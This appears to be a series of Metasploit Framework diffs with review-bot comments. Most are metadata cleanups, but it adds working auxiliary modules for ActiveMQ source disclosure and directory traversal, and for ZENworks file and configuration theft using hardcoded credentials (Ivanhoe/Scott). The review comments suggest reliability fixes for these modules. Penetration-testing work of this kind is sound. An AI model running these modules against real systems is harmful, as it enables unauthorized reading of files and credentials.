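Review bot: `run` discards the return value of `mssql_query(sql)`, so the module ends silently whether or not the injected `xp_dirtree` call went through and the operator cannot tell a failed injection from a silent success; capture it, `res = mssql_query(sql)`, and report via print_status/print_error based on whatever the MSSQL_SQLI mixin returns (its shape is not visible here). SMBPROXY is spliced into the SQL string unescaped; because it must be a host, validating it as an address before use (rather than accepting a free-form OptString) keeps the quoting from ever being broken. The Description reads 'execute the native "xp_dirtree" or stored procedure', which is missing a word; `'execute the native "xp_dirtree" stored procedure'` matches what the code does.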
@ -45,7 +45,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
|
||||
],
|
||||
# Tested OK against sol8.tor 20100624 -jjd
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Jan 22 2003')
|
||||
|
||||
register_options(
|
||||
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'OSVDB', '71420'],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-113/' ],
|
||||
[ 'EDB', 17078 ],
|
||||
[ 'EDB', '17078' ],
|
||||
],
|
||||
'DisclosureDate' => 'Mar 28 2011'))
|
||||
|
||||
@ -37,7 +37,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2010-2156' ],
|
||||
[ 'OSVDB', '65246'],
|
||||
[ 'EDB', 14185]
|
||||
[ 'EDB', '14185']
|
||||
]
|
||||
)
|
||||
register_options(
|
||||
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2011-0514' ],
|
||||
[ 'OSVDB', '70617' ],
|
||||
[ 'EDB', 15940 ],
|
||||
[ 'EDB', '15940' ],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 8 2011' ))
|
||||
|
||||
@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'URL', 'https://issues.apache.org/bugzilla/show_bug.cgi?id=48509' ],
|
||||
[ 'URL', 'http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
|
||||
[ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
|
||||
[ 'EDB', 11650 ]
|
||||
[ 'EDB', '11650' ]
|
||||
],
|
||||
'DisclosureDate' => 'Mar 05 2010'))
|
||||
|
||||
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'BID', '49303'],
|
||||
[ 'CVE', '2011-3192'],
|
||||
[ 'EDB', 17696],
|
||||
[ 'EDB', '17696'],
|
||||
[ 'OSVDB', '74721' ],
|
||||
],
|
||||
'DisclosureDate' => 'Aug 19 2011'))
|
||||
@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
Code execution may be possible however this module is only a DoS.
|
||||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
@ -40,10 +40,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'OSVDB', '70167' ],
|
||||
[ 'BID', '45542' ],
|
||||
[ 'MSB', 'MS11-004' ],
|
||||
[ 'EDB', 15803 ],
|
||||
[ 'EDB', '15803' ],
|
||||
[ 'URL', 'http://blogs.technet.com/b/srd/archive/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability.aspx' ]
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'DisclosureDate' => 'Dec 21 2010'))
|
||||
|
||||
register_options(
|
||||
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', 16204 ],
|
||||
[ 'EDB', '16204' ],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 22 2011'))
|
||||
|
||||
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-1899' ],
|
||||
[ 'OSVDB', '67978'],
|
||||
[ 'MSB', 'MS10-065'],
|
||||
[ 'EDB', 15167 ]
|
||||
[ 'EDB', '15167' ]
|
||||
],
|
||||
'DisclosureDate' => 'Sep 14 2010'))
|
||||
|
||||
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
|
||||
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],
|
||||
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
|
||||
[ 'EDB', 18606 ],
|
||||
[ 'EDB', '18606' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/03/21/metasploit-update' ]
|
||||
],
|
||||
'Author' =>
|
||||
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'BID', '46360' ],
|
||||
[ 'OSVDB', '70881' ],
|
||||
[ 'MSB', 'MS11-019' ],
|
||||
[ 'EDB', 16166 ],
|
||||
[ 'EDB', '16166' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2011/Feb/285' ]
|
||||
],
|
||||
'Author' => [ 'Cupidon-3005', 'jduck' ],
|
||||
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
[ 'CVE', '2010-2115' ],
|
||||
[ 'OSVDB', '64845' ],
|
||||
[ 'EDB', 12683 ]
|
||||
[ 'EDB', '12683' ]
|
||||
],
|
||||
'DisclosureDate' => 'May 21 2010'))
|
||||
|
||||
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 1 $',
|
||||
'Version' => '$Revision$',
|
||||
'DisclosureDate' => 'Jan 19 2012'
|
||||
))
|
||||
|
||||
@ -13,7 +13,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'IPv6 Link Local/Node Local Ping Discovery',
|
||||
'Version' => '$Revision: 13962 $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
Send a ICMPv6 ping request to all default multicast addresses, and wait to see who responds.
|
||||
},
|
||||
@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'H.323 Version Scanner',
|
||||
'Version' => '$Revision: 9804 $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => 'Detect H.323 Version.',
|
||||
'Author' => 'hdm',
|
||||
'License' => MSF_LICENSE
|
||||
@ -0,0 +1,71 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache ActiveMQ JSP files Source Disclosure',
|
||||
'Description' => %q{
|
||||
This module exploits a source code disclosure in Apache ActiveMQ. The
|
||||
vulnerability is due to the Jetty's ResourceHandler handling of specially crafted
|
||||
URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1
|
||||
over Windows 2003 SP2 and Ubuntu 10.04.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Veerendra G.G', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-1587' ],
|
||||
[ 'OSVDB', '64020' ],
|
||||
[ 'BID', '39636' ],
|
||||
[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8161),
|
||||
OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => "/#{target_uri.to_s}",
|
||||
'method' => 'GET',
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
contents = res.body
|
||||
fname = File.basename(datastore['TARGETURI'])
|
||||
path = store_loot(
|
||||
'apache.activemq',
|
||||
'text/plain',
|
||||
ip,
|
||||
contents,
|
||||
fname
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve file")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
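Review bot: Success is judged on `res.code == 200` alone, but a normally served JSP also answers 200, so if TARGETURI is given without a leading `/` the request degrades to an ordinary GET and the rendered HTML is stored as "source". The `//` prefix the Description identifies as the trigger is only produced by prepending `/` to a value that already starts with one; build it explicitly, `'uri' => "//#{target_uri.to_s.sub(%r{\A/+}, '')}"`, and confirm the body looks like JSP source before storing it, e.g. `unless res.body.include?('<%')` then print_error and return. A one-line comment at the request, `# leading // is what bypasses Jetty's ResourceHandler (CVE-2010-1587)`, would also save the next reader a trip to the advisory.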
@ -0,0 +1,80 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Apache ActiveMQ Directory Traversal',
|
||||
'Description' => %q{
|
||||
This module exploits a directory traversal vulnerability in Apache ActiveMQ
|
||||
5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's
|
||||
ResourceHandler installed with the affected versions. This module has been tested
|
||||
successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'AbdulAziz Hariri', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '86401' ],
|
||||
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],
|
||||
[ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8161),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
# No point to continue if no filename is specified
|
||||
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
|
||||
print_error("#{rhost}:#{rport} - Please supply FILEPATH")
|
||||
return
|
||||
end
|
||||
|
||||
travs = "/\\.." * (datastore['DEPTH'] || 1)
|
||||
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
|
||||
travs << datastore['FILEPATH']
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => travs,
|
||||
'method' => 'GET',
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
contents = res.body
|
||||
fname = File.basename(datastore['FILEPATH'])
|
||||
path = store_loot(
|
||||
'apache.activemq',
|
||||
'application/octet-stream',
|
||||
ip,
|
||||
contents,
|
||||
fname
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve file")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
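Review bot: The DEPTH option is described as "Traversal depth if absolute is set to false", but this module registers no ABSOLUTE option (the wording matches the ZENworks module added in the same commit), so the description is misleading; `'Number of /\\.. segments to prepend to FILEPATH'` says what it does. The `datastore['DEPTH'] || 1` fallback is dead because DEPTH defaults to 4, and the explicit nil/empty check on FILEPATH duplicates its `[true, ...]` required flag. A bare `res.code == 200` is also taken as proof the traversal worked; a 200 from Jetty's normal handler for a path that did not escape (a directory index, say) would be saved under the requested file name, so recording the response length and Content-Type alongside the loot, or warning when the body looks like HTML, would make false positives visible.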
@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
|
||||
'Version' => '$Revision: $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module simply attempts to read a remote file from the server using a
|
||||
vulnerability in the way Atlassian Crowd handles XML files. The vulnerability
|
||||
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'References' =>
|
||||
[
|
||||
['EDB', 12721],
|
||||
['EDB', '12721'],
|
||||
['OSVDB', '59001'],
|
||||
],
|
||||
'Author' =>
|
||||
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['OSVDB', '68301'],
|
||||
['URL', 'http://secunia.com/advisories/41609/'],
|
||||
['EDB', 15130]
|
||||
['EDB', '15130']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
@ -1,112 +0,0 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'net/http'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Del.icio.us Domain Links (URLs) Enumerator',
|
||||
'Description' => %q{
|
||||
This module pulls and parses the URLs stored by Del.icio.us users for the
|
||||
purpose of replaying during a web assessment. Finding unlinked and old pages.
|
||||
},
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
|
||||
OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
|
||||
OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def pull_urls(targetdom)
|
||||
response = ""
|
||||
list = []
|
||||
lastpage = 0
|
||||
pagenum = 1
|
||||
while lastpage == 0
|
||||
print_status("Page number: " + pagenum.to_s)
|
||||
header = { 'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"}
|
||||
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.delicious.com")
|
||||
resp = clnt.get2("/search?p=site%3A"+targetdom+"&page="+pagenum.to_s,header)
|
||||
response << resp.body
|
||||
response.each_line do |line|
|
||||
list << line.gsub!(/(.+<a rel=\"nofollow)(.+=+\")(.+)(\".+)/, '\3')
|
||||
end
|
||||
if /pn\ next/.match(data)
|
||||
pagenum += 1
|
||||
else
|
||||
lastpage = 1
|
||||
end
|
||||
end
|
||||
|
||||
list.delete_if{|x| x==nil}
|
||||
list.uniq!
|
||||
list.sort!
|
||||
|
||||
return list
|
||||
end
|
||||
|
||||
def write_output(data)
|
||||
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
|
||||
file_name = datastore['OUTFILE']
|
||||
if FileTest::exist?(file_name)
|
||||
print_status("OUTFILE already existed, appending..")
|
||||
else
|
||||
print_status("OUTFILE did not exist, creating..")
|
||||
end
|
||||
|
||||
File.open(file_name, 'ab') do |fd|
|
||||
fd.write(data)
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
if datastore['PROXY']
|
||||
@proxysrv,@proxyport = datastore['PROXY'].split(":")
|
||||
@proxyuser = datastore['PROXY_USER']
|
||||
@proxypass = datastore['PROXY_PASS']
|
||||
else
|
||||
@proxysrv,@proxyport = nil, nil
|
||||
end
|
||||
|
||||
target = datastore['DOMAIN']
|
||||
|
||||
urls = []
|
||||
print_status("Pulling urls from Delicious.com")
|
||||
urls = pull_urls(target)
|
||||
|
||||
print_status("Located #{urls.count} addresses for #{target}")
|
||||
|
||||
if datastore['OUTFILE']
|
||||
write_output(urls.join)
|
||||
else
|
||||
urls.each do |i|
|
||||
print_status(i)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
This module pulls and parses the URLs stored by Archive.org for the purpose of
|
||||
replaying during a web assessment. Finding unlinked and old pages.
|
||||
},
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'Author' => [ 'mubix' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
This module can be used to enumerate information
|
||||
about an IP addresses from Project HoneyPot's HTTP Block List.
|
||||
},
|
||||
'Author' => [ 'Rob Fuller <mubix[at]rapid7.com>' ],
|
||||
'Author' => [ 'mubix' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-2333' ],
|
||||
[ 'OSVDB', '65476' ],
|
||||
[ 'BID', '40815' ],
|
||||
[ 'EDB', 13850 ]
|
||||
[ 'EDB', '13850' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['CVE', '2011-0063'],
|
||||
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
|
||||
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
|
||||
['EDB', 16103]
|
||||
['EDB', '16103']
|
||||
],
|
||||
'DisclosureDate' => 'Mar 08 2011',
|
||||
'License' => MSF_LICENSE
|
||||
@ -31,8 +31,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-2263' ],
|
||||
[ 'OSVDB', '65531' ],
|
||||
[ 'BID', '40760' ],
|
||||
[ 'EDB', 13818 ],
|
||||
[ 'EDB', 13822 ]
|
||||
[ 'EDB', '13818' ],
|
||||
[ 'EDB', '13822' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
@ -0,0 +1,97 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Novell ZENworks Asset Management 7.5 Remote File Access',
|
||||
'Description' => %q{
|
||||
This module exploits a hardcoded user and password for the GetFile maintenance
|
||||
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
|
||||
Console and can be triggered by sending a specially crafted request to the rtrlet component,
|
||||
allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of
|
||||
remote files. This module has been successfully tested on Novell ZENworks Asset
|
||||
Management 7.5.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez' # Also the discoverer
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4933' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ] ]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptBool.new('ABSOLUTE', [ true, 'Use an absolute file path or directory traversal relative to the tomcat home', true ]),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']),
|
||||
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 1])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
# No point to continue if no filename is specified
|
||||
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
|
||||
print_error("Please supply the name of the file you want to download")
|
||||
return
|
||||
end
|
||||
|
||||
post_data = "kb=100000000&"
|
||||
if datastore['ABSOLUTE']
|
||||
post_data << "file=#{datastore['FILEPATH']}&"
|
||||
post_data << "absolute=yes&"
|
||||
else
|
||||
travs = "../" * (datastore['DEPTH'] || 1)
|
||||
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
|
||||
travs << datastore['FILEPATH']
|
||||
post_data << "file=#{travs}&"
|
||||
post_data << "absolute=no&"
|
||||
end
|
||||
post_data << "maintenance=GetFile_password&username=Ivanhoe&password=Scott&send=Submit"
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/rtrlet/rtr',
|
||||
'method' => 'POST',
|
||||
'data' => post_data,
|
||||
}, 5)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /Last 100000000 kilobytes of/ and res.body =~ /File name/ and not res.body =~ /<br\/>File not found.<br\/>/
|
||||
print_good("#{rhost}:#{rport} - File retrieved successfully!")
|
||||
start_contents = res.body.index("<pre>") + 7
|
||||
end_contents = res.body.rindex("</pre>") - 1
|
||||
if start_contents.nil? or end_contents.nil?
|
||||
print_error("#{rhost}:#{rport} - Error reading file contents")
|
||||
return
|
||||
end
|
||||
contents = res.body[start_contents..end_contents]
|
||||
fname = File.basename(datastore['FILEPATH'])
|
||||
path = store_loot(
|
||||
'novell.zenworks_asset_management',
|
||||
'application/octet-stream',
|
||||
ip,
|
||||
contents,
|
||||
fname
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve file")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
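Review bot: The nil guard on `start_contents`/`end_contents` can never fire: `res.body.index("<pre>") + 7` and `rindex("</pre>") - 1` are evaluated first, so a 200 response that passed the regex checks but lacks a `<pre>` block raises NoMethodError on nil before the check runs. Find the indices, test them, then apply the offsets, as below. Separately, FILEPATH is concatenated into `post_data` with no URL-encoding, so a path containing `&`, `%`, `+` or a space silently changes the form fields; sending the fields through `send_request_cgi`'s form-variable hash (`vars_post`, if this tree's HttpClient provides it) avoids that. The `+ 7` skips two bytes after the five-character `<pre>`, presumably a CRLF; say so in a comment rather than leaving a magic number.
```ruby
      pre_start = res.body.index("<pre>")
      pre_end   = res.body.rindex("</pre>")
      if pre_start.nil? or pre_end.nil?
        print_error("#{rhost}:#{rport} - Error reading file contents")
        return
      end
      # skip "<pre>" plus the line break that follows it; stop just before "</pre>"
      contents = res.body[(pre_start + 7)..(pre_end - 1)]
      # … unchanged: store_loot and reporting …
```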
@ -0,0 +1,74 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Novell ZENworks Asset Management 7.5 Configuration Access',
|
||||
'Description' => %q{
|
||||
This module exploits a hardcoded user and password for the GetConfig maintenance
|
||||
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
|
||||
Console and can be triggered by sending a specially crafted request to the rtrlet component,
|
||||
allowing a remote unauthenticated user to retrieve the configuration parameters of
|
||||
Nozvell Zenworks Asset Managmment, including the database credentials in clear text.
|
||||
This module has been successfully tested on Novell ZENworks Asset Management 7.5.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez' # Also the discoverer
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4933' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/rtrlet/rtr',
|
||||
'method' => 'POST',
|
||||
'data' => post_data,
|
||||
}, 5)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
|
||||
print_good("#{rhost}:#{rport} - File retrieved successfully!")
|
||||
path = store_loot(
|
||||
'novell.zenworks_asset_management.config',
|
||||
'text/html',
|
||||
ip,
|
||||
res.body,
|
||||
nil,
|
||||
"Novell ZENworks Asset Management Configuration"
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
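Review bot: The success message says "File retrieved successfully!" while the failure path says "Failed to retrieve configuration"; the module fetches configuration, so `print_good("#{rhost}:#{rport} - Configuration retrieved successfully!")` keeps the two consistent. The Description also has typos, "Nozvell Zenworks Asset Managmment" should read "Novell ZENworks Asset Management". It states that the page carries database credentials in clear text, yet they are only written to loot; if their position in the HTML is stable, parsing them out and passing them to `report_auth_info` would make them available to the rest of the framework instead of requiring the operator to read the saved file.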
@ -101,7 +101,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError
|
||||
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
end
|
||||
|
||||
begin
|
||||
|
@ -135,7 +136,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError
|
||||
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
end
|
||||
|
||||
disconnect()
|
||||
|
@ -154,7 +156,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
connect()
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError
|
||||
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
end
|
||||
disconnect()
|
||||
datastore['SMBDomain'] = orig_domain
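Review bot: The added `rescue ::Rex::Proto::SMB::Exceptions::ErrorCode`, like the now-anonymous LoginError rescue beside it, swallows the failure with no output in all three hunks, so a login rejected for any reason is indistinguishable from one that succeeded. If best-effort is the intent, still surface it in verbose mode, e.g. `rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e` followed by `vprint_error("#{rhost} - smb_login failed: #{e}")`. The surrounding method begins and ends outside these hunks, so whether a later check catches the failed login is not visible here.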
|
||||
@ -0,0 +1,94 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Lantronix Telnet Password Recovery',
|
||||
'Description' => %q{
|
||||
This module retrieves the setup record from Lantronix serial-to-ethernet
|
